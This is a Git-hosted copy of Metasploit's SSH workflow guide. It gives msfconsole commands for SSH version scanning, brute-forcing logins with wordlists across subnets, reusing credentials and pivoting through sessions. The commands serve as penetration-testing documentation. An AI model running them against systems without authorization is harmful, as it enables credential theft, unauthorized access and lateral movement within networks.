adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a20c281507fb9809988c8a8df6df8093d908bf3a
metasploit-gs/Metasploit-Guide-SSH.md
T
adfoster-r7 a20c281507 Use wordlist for clarity
2022-04-22 14:28:34 +01:00

1.4 KiB
Raw Blame History

SSH Workflows

SSH Enumeration

Enumerate SSH version:

use auxiliary/scanner/ssh/ssh_version
run ssh://127.0.0.1

SSH Bruteforce

Brute-force host with known user and password list:

use scanner/ssh/ssh_login
run ssh://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt

Brute-force credentials:

use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./wordlist.txt

SSH Login

If you have valid SSH credentials the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login
run ssh://user:pass@172.18.102.20

Re-using SSH credentials in a subnet:

use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@192.168.222.0 threads=50

Using an alternative port:

use scanner/ssh/ssh_login
run ssh://user:pass@192.168.123.6:2222

SSH Pivoting

Like Meterpreter, it is possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

To a route for the most recently opened Meterpreter session:

route add 172.18.103.0/24 -1
Reference in New Issue View Git Blame Copy Permalink